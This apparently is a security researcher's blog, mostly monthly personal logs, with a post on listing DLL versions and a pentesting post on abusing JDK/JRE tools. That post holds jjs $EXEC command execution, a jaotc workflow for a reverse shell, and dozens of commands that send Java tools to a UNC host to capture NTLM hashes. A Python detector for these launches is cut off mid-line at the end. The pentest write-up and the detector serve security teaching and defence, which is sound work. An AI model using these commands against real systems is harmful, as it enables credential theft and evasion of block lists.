Captain’s Log: December 2021

December was mostly a roaring success. I started to feel more like the me of old. I enjoyed time with my family and my partner. It was honestly a great end to the year. With a blip of being ill via Covid Booster in the last week of work. But C’est la vie. Progress isn’t a straight line and roads all get bumpy.

Time for the sort of monthly/annual summary:

11k steps a day – This was a target I set 12 months ago. After I had managed a full 365 days of doing 10k steps a day. It seemed like a minimal increase and one that was entirely achievable. Having moved myself so regularly in 2020 I was ready for massively increased activity and to finally lose weight again. Sadly I hurt my foot/ankle in March and I never really recovered. This was dead from the first quarter basically.
150 active minutes per week – This was the “real” target for 2021. Yeah I had done raw movement but now I wanted to structure genuine exercise back on a regular basis. I did manage this from December 2020 until the “injury”. Then it was unachievable while I adopted a strategy of resting up until the pain went away.
1 technical blog a month – I started 2021 with about 8 posts in draft and figured I would just put those out. When I delved into it some of the posts were now more-or-less irrelevant as the technologies were pretty much retired, dwindling, or when I googled found others had been quicker at posting the ideas. If we substitute this ambition for “do more security research” then I definitely managed that.

I was involved in three research projects which generated 17 CVE vulnerabilities blogged out of my employer’s website. There has been a slow down at getting CVE numbers issued by MITRE noticeable in the back end of 2021 which has held my final disclosure posts up.
Support my partner to exercise – They stopped asking for this and I now am just taking the kids on wild adventures on Saturday mornings.
Record five songs – I have definitely managed this and then some. So well done me. Still got many years of learning to do here but it really helps to set aside time to make music.
OSWE – Replaced this with sitting an exam that work needed me to do. One attempt was aborted last minute due to waiting on a kid’s negative COVID test meaning I could not travel to sit the exam. I did get to sit the exam in December and as I am writing this I await the result.
Panic Attacks – December was an excellent month. So let’s start with that. I got a lot more sleep than usual. I was far more relaxed as a result.

However, I did have one panic incident. This was triggered by the stress of travelling to London to sit the exam. I knew this one was going to come because I have been stuck in the house so long. The thought of getting on a plane was low key terrifying me for months. So obviously I had some proper white-knuckle terror moments after I checked my bag in at Glasgow airport. I just wanted to get in a taxi straight home and write off whatever was in my bag. You can make your own fight or flight joke here because I certainly have! It is plainly ridiculous to the cold logic engine which normally runs my brain.

I called my wife who talked me off the ledge. I splashed some water on my face and I took it one task at a time. As predicted the flight was actually fine and, as always, the journey home was an absolute riot where I felt none of the ill effects.

If we talk about the entirety of 2021 then I had fewer and much less impactful bouts than 2020. This is because I have coping strategies and I am exposing myself to triggers to challenge the absolute nonsense that is going on in the silly part of my brain. I think the trend will remain downwards in 2022.

Other bits

Audiobooks – still plodding on with the Shoal series. I have completed Nova War, and have moved on to Empire of Light. As I have gotten back some mobility I have been able to walk around listening to audiobooks. This has massively helped improve my mood. I listened to several hours of this on my trip to London.

Television 1 – Babylon 5. My partner (probably a bigger nerd than me) had never seen B5. So I halted my re-watch around season 3 and started it again with them in the evenings. It has been really nice seeing them predict the plot twists several times and use their fantastic talent of spotting any jobbing actor that has ever been in Star Trek within moments regardless of how heavily made up they were in either show. This is an honest to god super power! Sometimes the voice is enough. It is amazing.

Television 2 – Star Trek (Original Series). Such melodrama. I live for the musical cues. Episodic content where every character resets between the end of one show and the next week is kind of jarring in the modern age. I cannot get over how Lt Uhura had her ENTIRE MEMORY ERASED in one episode. They start to teach her basic skills and by next week she was totally over it! If you have any example of a character being reset harder than that I would love to hear it!

Video Games 1 – Wolfenstein: the new colossus. What a wild ride! I am only a few hours into it and have massively enjoyed the story. It is absolutely nuts.

Video Games 2 – Football Manager 2021 (not the latest one). I do enjoy spreadsheets and I have certainly got my money’s worth out of this over the last 12 months. I have a save game where Scotland won a Euros championship about 4 years from now. Let’s hope life imitates that save game 😀

Family – Kid A has been improving their behaviour by virtue of finally maturing. Progress is not a straight line and we are still getting frequent calls from the school about them. But there are more good days than there were before. The penny is starting to drop. Kid B is now showing a hilarious and much more chilled personality than Kid A. They are very different beasts.

House – planning permission and drawings all done for a loft conversion so we are going to have to find building companies to give us quotes. Finding trusted partners to do projects is always the real challenge. We are fighting whatever Brexit nonsense RE: materials and labour so the project might be dead before it is off the ground if the prices are out of range.

  • Plan A is “top down” – loft conversion. If the quotes are reasonable. Otherwise…
  • Plan B is “bottom up” – the ground floor is an absolute mess and we can get significantly better living conditions by replacing the kitchen and bathroom which we definitely have the budget for. Annoying that the home report lied so hard about the condition of the place that this is now necessary to replace floors that are marked as “category 1 – Excellent”.

Health – saving the biggest bit for the end. I went to a private Physio twice before Christmas. I had been waiting several months for a GP referral to land before resuming exercise. I had put on weight due to inactivity and it was making me more miserable. The Physio has confirmed that the pain is now most likely because I have rested an injury too long and allowed that area to atrophy. A few stretches and exercises chucked my way and I have already significantly reduced the pain. The main thing I needed was confidence that resuming exercise was not going to risk further injury and I was told categorically this was not the case. So I am taking baby steps back to jogging which is an activity that always improves my physical and mental health enormously. I have been given a green light to do the thing I wanted to. I am already seeing early results and cannot wait!

Regards

Captain’s Log: November 2021

This month was remarkable for the joy of walking again! It is truly a simple pleasure to be able to go places. Last month I broke a toe and it is now ok to walk again.

11k steps a day – I am not really aiming for this as I recover from the various injuries. I have managed two or three 10k steps a day per week this month which is a step in the right direction.
150 active minutes per week – Nowhere close. But I managed about half from the walking. A huge improvement from a month of being stationary. My mood and everything is so much better.
1 technical blog a month – Finally published research via the work blog covering 10 CVEs in OpenCMS 11.0.2. These were found in collaboration with my colleague Sam Moore. I also published a Proof Of Concept for the ClickJacking vulnerability which resulted in admin level access.
Support my partner to exercise – They stopped asking for this and I now am just taking the kids on wild adventures on Saturday mornings.
Record five songs – I have probably recorded more than 5 songs for the year. So let’s smash that goal this month... *woo*.

I am making it a pretty regular hobby now. Considering upping my game with collaborations, or maybe biting the bullet and getting singing lessons and such. I have never taken it seriously but it is kind of fun.

I have not practiced playing guitar so often in my entire life and can feel lots of gains.
OSWE – This was a personal goal. I was asked by work to pursue another exam so this is probably not going to happen. If we are honest I am getting the joy of studying and improving my technical ability anyway. So this has changed to be “study to get better at the technical side”. I have been smashing through some more stacks so it is paying off.
Panic Attacks – November was a pretty clear month. One or two moments where I needed to remember to hydrate and rest.

Other bits

Panic Attacks – I have not been on a train in years. The last time I did, I had a panic attack. Now I know that it was entirely unrelated in my conscious mind. But it is undeniable that I have chosen to avoid trains since. It was very unpleasant to be stuck on a train for 3 hours panicking back at a time I had no coping techniques at my disposal. I do have tools now. Soooooo… I went on four different trains this month. Not going to lie. There was definite uneasiness on the outward journeys. But I *always* came home smiling and full of the joys of life. Exposure therapy in action. The image for this post shows my face on the way out and back on my first trip.

Audiobooks – still plodding on with the Shoal series. I have completed Nova War, and have moved on to Empire of Light. As I have gotten back some mobility I have been able to walk around listening to audiobooks. This has massively helped improve my mood.

Television 1 – Doctor Who was back with a bang! On Halloween an opener to the Flux story line left me thirsty for more. Then this month it continued to deliver joy. It was nice to properly watch this with the kids. They have mostly sat there politely and let us watch it.

Television 2 – I watched all of Kim’s Convenience this month. It was joyous. Let some of this into your heart.

Public Speaking – I did a talk at Edinburgh Defcon for the first time. I always figured I would be drinking beers in Edinburgh when I did. But… It was good to get off the fence.

Video Games 1 – Hollow Knight has been a bit of an obsession the last 2 months. I have sunk around 60 hours into it. I was attempting to get the PS4 trophies and also generally just loved getting lost in it. The platforming was joyous, the art gorgeous, and the boss battles challenging. I could have completed the story much faster but I kept hunting around for more to do. I am letting this linger on and refuse to end the story until I have done the fools challenge.

Video Games 2 – Wolfenstein: the new colossus. I somehow missed that this came out. The story is absolutely WILD. I am surely not even half of the way into this and it is such a roller coaster. I write this after a very powerful scene. The plot twist was absolutely brilliant.

Family – I played a lot of board and card games with the kids. We went to the park several times. Their granny visited. The eldest had some play dates. I taught my eldest literally everything I know about playing the piano, then we jammed! They are getting good at singing and hopefully getting confidence from it. We put the Christmas decorations up together. It was all rather nice.

House – We have tried to get builders to quote for an attic conversion. Not many have come to view the project. None have as yet delivered a quote. We still have no idea if we can even afford to do this. I have gone with doing smaller things myself regularly to feel progress. This month we built a new cabinet for the kitchen and finally gained the counter space and storage we needed to put all of our kitchen stuff into the kitchen. The next project will be to sort through the things in the kitchen so that they are to hand where they should be. This will be a big change.

This was mostly a great month.

Regards

Captain’s Log: October 2021

First, a highlight. I recorded a wee video which should speak to parents everywhere:

I was waiting for paint to dry with the front door open for air flow when I made this. As a bonus the neighbours have left me alone since!

This was a month marred by breaking my big toe on my left foot. It was sore but I have had worse. The featured image is the first day I managed to brave putting a shoe on. I have now healed up and am raring to start a bit of walking again.

Here is how I did in the new condensed table format.

11k steps a day – I hurt my right ankle in March so this took a backburner. I started October getting back to decent mobility. Then guess what? I broke the big toe on my left foot! A temporary set back. By the last week of October I was able to walk about without flinching so I am hitting November with delusions of walking around again. I need to. I have put so much weight on with all these setbacks.
150 active minutes per week – Nowhere close. The broken toe really made this impossible.
1 technical blog a month – I sneaked out a short blog post about finding missing patches in .net applications where you don’t have the source code.

There is also one that is still ready and waiting on some CVE references to get assigned.
Support my partner to exercise – They stopped asking for this and I now am just taking the kids on wild adventures on Saturday mornings.
Record five songs – I have probably recorded more than 5 songs for the year. I am making it a pretty regular hobby now. Considering upping my game with collaborations, or maybe biting the bullet and getting singing lessons and such. I have never taken it seriously but it is kind of fun.
OSWE – I’ll be honest I think this is a Winter time activity. I was due to sit an exam this month so I took on the Portswigger Academy labs for a while. I really appreciate that these labs existed and that they are available for free. I still have lots of them to get through but I might actually do that exam instead of OSWE.
Panic Attacks – The start of October was pretty brilliant. I was getting back into the zone. I was sleeping, I was eating right, and exercise was in the right direction. The foot injury had the possibility of dragging me into depression but I chose to tell myself it was a brief delay and it worked. It was a tough month but I weathered it well.

Other bits

Audiobooks – still plodding on with the Shoal series. I am at Nova War. Without massive stretches of the day where I am walking about outside I did not really get the time for this it deserves. But it is good.

Television 1 – Deep Space 9. I finished this again. There are episodes that need to start with “warning; contains Gul Dukat and Kai Winn kissing”. Still a very entertaining show. Some really amazing episodes.

Television 2 – Watching Another Life season 2. I am completely bemused as to what happened in Season 1. There was no recap and me and my partner in crime were significantly confused. It is a good show. I love that the aliens are clearly Scottish “Ach-aye-ians”? You cannot hide that from me.

Television 3 – Doctor Who was back with a bang! On Halloween an opener to the Flux story line left me thirsty for more.

Television 4 – I re-watched Kimmy Schmidt. An excellent show. Lots of laughs in there and yet they covered quite a lot about mental health and inclusivity too. Honestly joyous.

Family – Unfortunately my foot injury happened the day before I had days booked off for half term. Instead of jollies I ended up with my foot up and yelling at the kids to please stop hitting it (which appeared to be their chosen activity)! Classic. Then when I was back to a bit of mobility there was a cold/flu that ran through the family sticking us in several staggered periods of isolation awaiting COVID tests. It was a very tough week the one before Halloween. I upped the interaction with my eldest by getting off the bench and playing the Pokemon card game several times. With my partner being ill I was doing a lot of extra things and it was challenging.

House – I have started doing small DIY projects in the house. One a week. I have stared at damage I am capable of fixing for the entire 12 months we have lived here. The problem has been we know there will be a massive building project (attic conversion) and anything I do will likely get destroyed then. It has been depressing since the chances are a decent building firm will be booked into 2022 or 2023. In finally accepting that, I have decided to do minor patching and decorating myself. It is certainly making me feel better about the place. The plaster work is so bad that if we ever properly “do” a room, we are going to need it to be ripped back to brick and plastered before anything is done. Until doing that everything is just mucking around.

That is the log for October. I am looking forward to November. All the bad luck is officially over because I have decided it is.

If you have kids. I wish they eat their food for you.

Finding Missing Patches the hard way

In this post I present a short piece of PowerShell that helped me find missing patches in a .net application. The target was a thick client where source code was not provided. Almost everything has outdated dependencies and the goal for me is to see if any of them will provide an obvious way to exploit the target. Even if the dependencies are not exploitable it is great to get an insight into the development practices.

The backwards/hard way (No Source code)

The problem (for .net) can be broken into two stages:

  1. Identify the version information for all .dll files.
  2. Grunt work using Google to find the latest versions and any known vulnerabilities.

The first part was solved by the PowerShell below. Simply change the path and you get the filename and version number, comma-separated, one DLL per line:

# List every DLL in the folder and emit "<filename>,<file version>" per line.
# Change the path to the application's install folder.
Get-ChildItem "C:\<path>\<to>\<folder>" -Filter *.dll |
ForEach-Object {
    # Get-Command on a file path returns an ApplicationInfo object whose
    # FileVersionInfo is read from the DLL's PE version resource.
    $version = (Get-Command $_.FullName).FileVersionInfo.FileVersion
    Write-Output "$($_.Name),$version"
}

Then for the dirty task: opening that output in Excel and using Google to confirm which were outdated. There is probably a shortcut somewhere for this task, but in the time available that did me.
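As an added example (my own, not the post’s script or any vendor tool), here is a fuller version of the first stage: it walks the install folder recursively and records the file, product and assembly version of every DLL, writes the lot to CSV for the Excel/Google stage, and first lists any DLL that ships in more than one version under the same install folder, since one of those copies is usually the stale one. The function and variable names, the install path C:\Program Files\ExampleApp and the CSV location are assumptions.

```powershell
# Added example (not the post's script): recursive DLL inventory for a .NET
# application folder. The install path and output file below are assumptions;
# point $Target at the application's install folder.

function Get-DllInventory {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [switch] $Recurse
    )

    Get-ChildItem -Path $Path -Filter *.dll -File -Recurse:$Recurse | ForEach-Object {
        $dll = $_
        # VersionInfo is read from the PE version resource, the same data the
        # post's (Get-Command ...).FileVersionInfo trick returns.
        $vi = $dll.VersionInfo

        # Managed assemblies also carry an AssemblyVersion in their manifest;
        # GetAssemblyName reads it without loading the DLL. A native (unmanaged)
        # DLL throws BadImageFormatException, which we record as 'native'.
        try {
            $asmVersion = [System.Reflection.AssemblyName]::GetAssemblyName($dll.FullName).Version.ToString()
        } catch [System.BadImageFormatException] {
            $asmVersion = 'native'
        } catch {
            $asmVersion = 'unreadable'
        }

        [PSCustomObject]@{
            Name            = $dll.Name
            Directory       = $dll.DirectoryName
            FileVersion     = $vi.FileVersion
            ProductVersion  = $vi.ProductVersion
            AssemblyVersion = $asmVersion
            Company         = $vi.CompanyName
            Product         = $vi.ProductName
            LastWriteUtc    = $dll.LastWriteTimeUtc
        }
    }
}

# Assumed install folder and output location for the example run.
$Target  = 'C:\Program Files\ExampleApp'
$OutFile = Join-Path $env:TEMP 'dll-inventory.csv'

if (Test-Path -LiteralPath $Target) {
    $inventory = Get-DllInventory -Path $Target -Recurse

    # Full inventory for the spreadsheet stage of the post.
    $inventory | Export-Csv -Path $OutFile -NoTypeInformation

    # Quick wins before opening the spreadsheet: the same DLL present in more
    # than one version under the install folder usually means at least one copy
    # is stale, so those get triaged first.
    $inventory |
        Group-Object Name |
        Where-Object { @($_.Group.FileVersion | Sort-Object -Unique).Count -gt 1 } |
        Select-Object Name, Count,
            @{ Name = 'Versions'; Expression = { @($_.Group.FileVersion | Sort-Object -Unique) -join '; ' } } |
        Format-Table -AutoSize
}
```

The AssemblyVersion column is worth keeping alongside FileVersion: for .NET packages the two are often set independently, and advisories for managed libraries are usually keyed on the assembly or NuGet package version rather than the Win32 file version.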

What if you have the source code?

When you have source code access then your go-to is OWASP’s Dependency-Check.

While I love Dependency-Check, and feel it is the best catch-all due to the wide range of languages it supports, I have also found that it is prone to false positives. Working with the formats it outputs is often a lot of work, for me at least. It is definitely a worthy tool and I will continue to use it.

If you have access to the source then I generally get better and more actionable information using language-specific tools such as:

Hope this helped you in your hour of need.

Captain’s Log: September 2021

Here is how I did in the new condensed table format.

11k steps a day – I hurt my ankle in March. Working on it with stretches and am back to walking about a bit. Hit several 10k steps days in the month too.
150 active minutes per week – Nowhere close. But I was closer than last month so positive.
1 technical blog a month – It is written but waiting for the vendor patches which are in mid-October.
Support my partner to exercise – They stopped asking for this and I now am just taking the kids on wild adventures on Saturday mornings.
Record five songs – I still don’t know how to use Reaper but I have found the odd hour-long slots to write and record some stuff. It is all rough and cringey but I guess you don’t get anywhere without practice.

Smiles
Cowboys Have Metaphors
No Manual

There was also a Webinar that I did for work where I ended with a song. I have linked to that bit of the video at the end.
OSWE – I’ll be honest I think this is a Winter time activity.
Panic Attacks – September was a very stressful month at times. We were ill in a loop after the kids returned to school/nursery. There were several negative covid tests and many many lost hours of sleep. As always, the panic attacks come when there is a lack of sleep. For the September weekend we got away some place. It was invigorating so I ended the month really probably the happiest I have been in a while. Hence the music getting made.

Other bits

  • Research – Vendor is releasing patches in October so I will be able to speak about this on various blogs next month. I have invested £99 in a bit of hardware just to go looking for vulns to mix up the target for the next time. That has not panned out great so far. It has actually been a pretty hard target given the limited number of features enabled and real effort being put into disabling all the androidy options that you would usually be able to flip on.
  • Work Stress – I had a very stressful time at work early in September where I put in an ungodly amount of hours over a week. I got the thing done so eventually feel good about it but living through it. But I was pretty close to burning out. I did get support from colleagues when I put my hand up so remember to work at places where you can play that card and know you will get assistance.
  • Audiobooks – Still plodding on with the Shoal series. I am at Nova War. Without massive stretches of the day where I am walking about outside I am not really getting the time for this it deserves. But it is good.
  • Television 1 – Deep Space 9. Really close to the end of it. There has been noise about Netflix losing various Star Trek franchises soon. Initially that seems to just be in the US but I guess the writing is on the wall. A fair amount of Netflix’s appeal to me is because it has ST properties. So let’s see.
  • Television 2 – Man Down. I finally got around to watching it all. What a great show that was. Disappointed to not get a resolution to the cliffhanger ending. It made me seriously crave more Rik Mayall energy. His part in the first series was absolutely electric.
  • Family – First weekend we did play date on the Saturday then a nice breakfast at a café. This was nice because I actually met some dads for a change. Usually I head along to the park for the exercise. But hey there I was debating whether a 36 year old Cristiano Ronaldo would have earned his transfer fee back in shirt sales already. I think yes. Kid 1 is getting to an age where they can almost watch a game of football with me staying up late to do so having survived the Scotland vs Moldova game.
  • Family 2 – We managed a long weekend away from the house. I am dubbing this the anxiety buster. After years of cancelled or hectic and horrible holidays we managed one where I mostly relaxed. I came back more positive and more able to sign up to things.
  • Car Upgrade – Got a new car stereo fitted. Because who knew that phones would be made one day in the future without Aux cables??? Had to join the Bluetooth revolution eventually I guess.

For those who stuck to the end. Here is the outtro song from the Webinar I did:

Yes that is majorly product placement for my current employer. But that was the gig. Technically I was paid to write a song there so I am now semi-professional.

That is the log for September.

Captain’s Log: August 2021

Here is how I did in the new condensed table format.

11k steps a day – I hurt my ankle in March. Working on it with stretches and am back to walking about a bit.
150 active minutes per week – Not found an exercise I can get done with my ankle like this. There is quite limited availability for swimming pools atm due to covid and my exercise bike would put pressure on the ankle. Waiting on a referral to see what’s what with it. Though just at the end of the month I got back on the bike as the ankle had felt better for several days.
1 technical blog a month – It is written but waiting for the vendor patches.
Support my partner to exercise – They stopped asking for this and I now am just taking the kids on wild adventures on Saturday mornings.
Record five songs – I played with Reaper a bit more. But no completed songs. I still don’t know how to use DAWs because I am fairly chaotic and have zero sense of timing.
OSWE – I’ll be honest I think this is a Winter time activity.
Panic Attacks – I have been well clear of panic attacks. Probably because I mostly got sleep when sleep was good to be got. But to clarify I feel a sense of dread literally every time I go to do something. It is exhausting to push through that sometimes but I always drive home happy and singing from every jaunt out.

Other bits

  • Research – Waiting on a vendor to patch vulns before I can toot about the next batch.
  • Audiobooks – Still plodding on with the Shoal series. I am at Nova War. Without massive stretches of the day where I am walking about outside I am not really getting the time for this it deserves. But it is good.
  • Television 1 – Deep Space 9. This is probably the 3rd time I have started watching it through. This time I am seeing it through the lens of racism. The whole show seems to be about hating the Cardassians at the start. Even from Miles who is supposed to be an enlightened Human member of Star Fleet.
  • Family – Still working on fun for family, fun for me and my partner, and fun for me. Not doing too badly at it. We have been out and about more for food. To a few museums. It has been pleasant. We even made it to a swimming pool in Glasgow for the first time this year. It has been impossible to book slots all summer. When they stopped taking bookings we rocked up at 9am to be told there was an hour to wait and we were entirely unprepared for that. So it was a victory to finally get into a pool.
  • Family 2 – With the return to school we have gained a less stressful work-life balance (aside from odd drop off and pickup times). My partner (and primary child herder) has enjoyed a few weeks of afternoons free of childcare and has thoroughly and deservedly chilled out. The much delayed thinking about returning to work is now back on the cards. It is rarely spoken about how childcare can be monotonous and unrewarding for some people. But because of love, and covid, they have stuck ably to the task for years beyond the age nurseries would take the kids. Not to be a martyr, but because we believed it was right to do it this way for us. That has come at a cost to our mental health at times. The last time there was light at the end of this tunnel lockdowns started and punched that back down hard for over a year. Living a life waiting for time to tick is exceptionally hard.
  • Pentesting – I found a target with “.svn” folders and used svn-extractor to get the win.
  • Housey stuff – Most weekends this August we do about an hour of tidying up as a family and get the place pretty decent. Many hands make light work and all that! That is what this month’s featured image is about. The fact we were tidying stuff regularly. As a result I was also able to do some of the DIY tasks and get things variously recycled, gifted, or out of my life forever as appropriate. My home office has had a re-orientation and I am considering getting a second desk for “hobbies”. We have also paid for a new floor for the kitchen and are waiting on an installation date. It will be great to finally be able to mop a surface. I could rant for hours about how this house has broken flooring everywhere but I won’t.

That is the log for August.

Java giving more shells on everything

Back in 2018 I blogged about how Java gives a shell for everything, and also how to compile in memory as an AV evasion technique. Some of these techniques have now been added into GTFOBins, and heroes even integrated them into Metasploit.

In this post I go through the most recent JDK/JRE and look for new features Pentesters may find useful. Apologies for this reading a bit like a shotgun blast of information, but this is essentially the notes I took as I poked around, in the order I did it. I am personally most interested in the last part with “jshell”; if you want to see just one part then go there.

First what about different Versions of Java?

Java ships in two main forms:

  • Java Runtime Environment (JRE) – Which is used on machines that only need to execute Java code. The binary “java” is used to execute code.
  • Java Development Kit (JDK) – Which is needed on developer machines. The “javac” command is used to compile “.java” files into “.class” files which can then be executed.

If you have landed on a laptop or workstation the chances are only the JRE is installed unless the user is a developer. If you land on a server which hosts a website powered by Java you probably have the JDK installed. There are far more binary commands bundled in the JDK than the JRE so there is more scope for naughtiness with the JDK.

Comparison of Binaries Available in JRE/JDK

I downloaded the most recent Windows JRE and JDK and compared the list of executables in the “/bin” folder. The raw data is in this spreadsheet. The short version is that these are the binaries which are shared between the JRE and JDK:

List of commands shared by the JRE and JDK:

  • jabswitch
  • java
  • javaw
  • keytool
  • kinit
  • klist
  • ktab
  • rmid
  • rmiregistry

If you find something that works in these binaries then you should congratulate yourself for finding a universal Java technique.

Other points of note from the spreadsheet:

  • jjs.exe exists in the latest JRE meaning our JavaScript payload techniques are still in play there.
  • jrunscript.exe exists in the latest JDK. However, there appeared to be no Nashorn included.

I can confirm that Nashorn worked in “jjs.exe” for the most recent JRE:

Hello from Nashorn in JRE

And that it did not work out of the box for “jrunscript.exe” in the most recent JDK:

No Nashorn for you.

While the binary exists it has been neutered unless Nashorn has been added separately.

An easier command prompt via JJS

Last time I gave JavaScript commands that you could type into a JJS prompt which would give you a reasonably interactive command prompt. The reason for doing this is to get a functional command prompt in an environment where powershell.exe, cmd.exe, ftp.exe etc. are all blocked, i.e. where block lists are used instead of allow lists for running binaries. In that universe “jjs.exe” worked no problem.

This time I properly RTFM and spotted this nugget:

The JJS Manual

If you run “jjs” with “-scripting=true” then it will give you access to the “$EXEC()” function. This can be used to execute local commands within JJS without needing to type in any JavaScript:

Using $EXEC

A minor improvement depending on how you want to look at it. It is a little inconvenient typing “$EXEC()” every time. So you can save a few keystrokes with a simple function that shortens it:

using “a” function to alias $EXEC()

But then I got intrigued by what other binaries were hanging around in a modern JDK install. So I looked into the contents of the “bin” folder again.

Ahead of Time Compilation with jaotc

I spotted a new binary called “jaotc” which has a useful tutorial here. Jaotc is summarised as:

“The Java static compiler that produces native code for compiled Java methods”

Ears of hackers must have pricked up there. Did you say “native code”? Can confirm it did. It aims to make faster Java apps by allowing you to convert a class to native code.

It will compile a class file into a “.so” library. Let’s assume you have a reverse shell in “rev.java”; your workflow is like this:

javac rev.java
jaotc --output rev.so rev.class

Line 1 compiles it into normal Java Bytecode.
Line 2 converts that to a native library.

If you run the file command it is now an ELF binary:

file rev.so
rev.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, not stripped

Who knows what transforms have just gone on to make that magic work. The transforms might be useful for hiding payloads. I am not a reverse engineer by any stretch of the term so I have probably not grasped the hacking potential of this.

To run your library via Java you need to do this:

java -XX:+UnlockExperimentalVMOptions -XX:AOTLibrary=./rev.so

Note: at the moment this is an experimental option so you need the “UnlockExperimentalVMOptions” argument.

It will work on Linux and on the Windows Subsystem for Linux. There is no support for compiling “.dll” files so this is going to be a niche choice, and I am not entirely sure how to use it for nefarious purposes today. A pin in that for later maybe.

Triggering DNS/Getting NTLM Hashes

JDK/JRE binaries allow input files within their command line arguments. These accept UNC paths so can be used to trigger DNS resolution. If you are on the same network (or the Firewall is crazy and allows SMB outbound) then you can use responder to capture NTLM hashes:

Capturing hashes landing in Responder Logs

Note: I have a recent post which includes a bit on how to crack these hashes.

JDK/JRE binaries have a myriad of options which handle file paths. I stopped looking when I had found one way to do it per binary, or when I had spent longer than 5 minutes looking. Therefore this is not exhaustive and there will be more:

jar -v -t --file=\\192.168.45.129\test
jarsigner -verify \\192.168.45.129\test
java \\192.168.45.129\test
javac \\192.168.45.129\test
javadoc \\192.168.45.129\test
javap \\192.168.45.129\test
jcmd 1 -f \\192.168.45.129\test
jdeprscan.exe \\192.168.45.129\test
jdeps \\192.168.45.129\test
jfr metadata \\192.168.45.129\test
jhsdb clhsdb --core \\192.168.45.129\test --exe test.exe # Do not use this
jimage info \\192.168.45.129\test
jlink --module-path \\192.168.45.129\test
jmap -histo:live,file=\\192.168.45.129\test <pid> # Requires PID for valid Java Process
jmod list \\192.168.45.129\test
jpackage --input \\192.168.45.129\test --main-jar test
jrunscript.exe -cp \\192.168.45.129\test
jshell \\192.168.45.129\test
kinit -c \\192.168.45.129\test
klist -c -f FILE:\\192.168.45.129\test
ktab -k FILE:\\192.168.45.129\test
rmid -log \\192.168.45.129\test

Note: the “jhsdb” command opens its own command prompt interface which would remain open if you had a victim open it. While it did result in an SMB handshake I would not advise using this.

In addition to those above, I found an almost universal way to trigger an SMB interaction. Most binaries would run a JVM when they execute, which makes sense because they are made in Java. The JVM supports various options. The “Xloggc” option (or the incoming “-Xlog:gc” syntax) can specify the location for a log file whenever the JVM does garbage collection. It accepts UNC paths.

The beautiful thing is that this triggers an SMB connection as the JVM loads, meaning that you do not need to supply valid command line arguments to the binary you are launching. This saves a lot of effort reading “--help”.

The following is a list of examples that worked for the most recent JDK binaries:

jaccessinspector.exe -J-Xloggc:\\192.168.45.129\test
jarsigner.exe -J-Xloggc:\\192.168.45.129\test
javadoc -J-Xloggc:\\192.168.45.129\test
javap -J-Xloggc:\\192.168.45.129\test
javaw -Xloggc:\\192.168.45.129\test # This causes a GUI popup error
jcmd -J-Xloggc:\\192.168.45.129\test
jconsole -J-Xloggc:\\192.168.45.129\test # This causes a GUI popup error
jdb -J-Xloggc:\\192.168.45.129\test
jdeprscan -J-Xloggc:\\192.168.45.129\test
jdeps -J-Xloggc:\\192.168.45.129\test
jfr -J-Xloggc:\\192.168.45.129\test
jhsdb -J-Xloggc:\\192.168.45.129\test
jimage -J-Xloggc:\\192.168.45.129\test
jinfo -J-Xloggc:\\192.168.45.129\test
jlink -J-Xloggc:\\192.168.45.129\test
jmap -J-Xloggc:\\192.168.45.129\test
jmod -J-Xloggc:\\192.168.45.129\test
jpackage -J-Xloggc:\\192.168.45.129\test
jps -J-Xloggc:\\192.168.45.129\test
jrunscript -J-Xloggc:\\192.168.45.129\test
jshell -J-Xloggc:\\192.168.45.129\test              
jstack -J-Xloggc:\\192.168.45.129\test     
jstat -J-Xloggc:\\192.168.45.129\test              
jstatd -J-Xloggc:\\192.168.45.129\test      
keytool -list -J-Xloggc:\\192.168.45.129\test
kinit -J-Xloggc:\\192.168.45.129\test
klist -J-Xloggc:\\192.168.45.129\test              
ktab -J-Xloggc:\\192.168.45.129\test             
rmid.exe  -J-Xloggc:\\192.168.45.129\test
rmiregistry -J-Xloggc:\\192.168.45.129\test
serialver -J-Xloggc:\\192.168.45.129\test

Pretty much every binary in the JDK supported this approach!

As the “java” command runs the JVM directly there is no need for the “-J-” part, so this is the syntax for doing the same there:

java -Xloggc:\\192.168.45.129\test

When a binary existed in both the JDK and JRE there were subtle differences. For example, the JDK version of “javaw” required the “-J-” syntax, while the JRE version worked using “-Xloggc” directly.
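From the defender’s side, both lists above (UNC paths in file-handling arguments, and -Xloggc / -J-Xloggc) collapse into one detection: a JDK or JRE tool started with a UNC path anywhere on its command line. The following is an added example, not code from the original post; it runs over constructed process-creation records whose Computer, Image and CommandLine fields are assumed to follow Sysmon event ID 1, and rates -Xloggc hits higher because they fire before the tool validates its own arguments.

```python
"""Flag JDK/JRE tool launches whose command line carries a UNC path.

Added example, not from the original post. Input records are constructed and
assumed to mirror Sysmon event ID 1 (Computer, Image, CommandLine), with the
command line stored unescaped, i.e. single backslashes in local paths.
"""
import re
from typing import Dict, List

# Tools from the two lists in the post (wrapper tools take -J-Xloggc, java
# itself takes -Xloggc). Compared case-insensitively, without a .exe suffix.
JAVA_TOOLS = {
    "jaccessinspector", "jar", "jarsigner", "java", "javaw", "javac", "javadoc",
    "javap", "jcmd", "jconsole", "jdb", "jdeprscan", "jdeps", "jfr", "jhsdb",
    "jimage", "jinfo", "jlink", "jmap", "jmod", "jpackage", "jps", "jrunscript",
    "jshell", "jstack", "jstat", "jstatd", "keytool", "kinit", "klist", "ktab",
    "rmid", "rmiregistry", "serialver",
}

# \\host\share... not preceded by a word character or another backslash.
UNC_RE = re.compile(r"(?<![\w\\])\\\\[^\\\s]+\\\S*")
# GC log destination: legacy -Xloggc:<path> or unified -Xlog:gc...:file=<path>,
# optionally behind the -J prefix that wrapper tools use to pass JVM options.
XLOGGC_RE = re.compile(r"(?:-J)?-X(?:loggc:|log:gc\S*?:file=)(\S+)", re.IGNORECASE)


def tool_name(image: str) -> str:
    """Lower-cased basename of the image path without a trailing .exe."""
    name = re.split(r"[\\/]", image)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def classify(event: Dict[str, str]) -> Dict[str, object]:
    """Return a finding for one process-creation event, or {} if nothing matched."""
    name = tool_name(event["Image"])
    if name not in JAVA_TOOLS:
        return {}
    cmd = event["CommandLine"]
    unc_paths = UNC_RE.findall(cmd)
    if not unc_paths:
        return {}
    gc = XLOGGC_RE.search(cmd)
    # A UNC GC-log path is reached as the JVM starts, before the tool looks at
    # its own arguments, so it is the higher-confidence signal.
    severity = "high" if gc and UNC_RE.match(gc.group(1)) else "medium"
    return {"host": event["Computer"], "tool": name, "unc": unc_paths,
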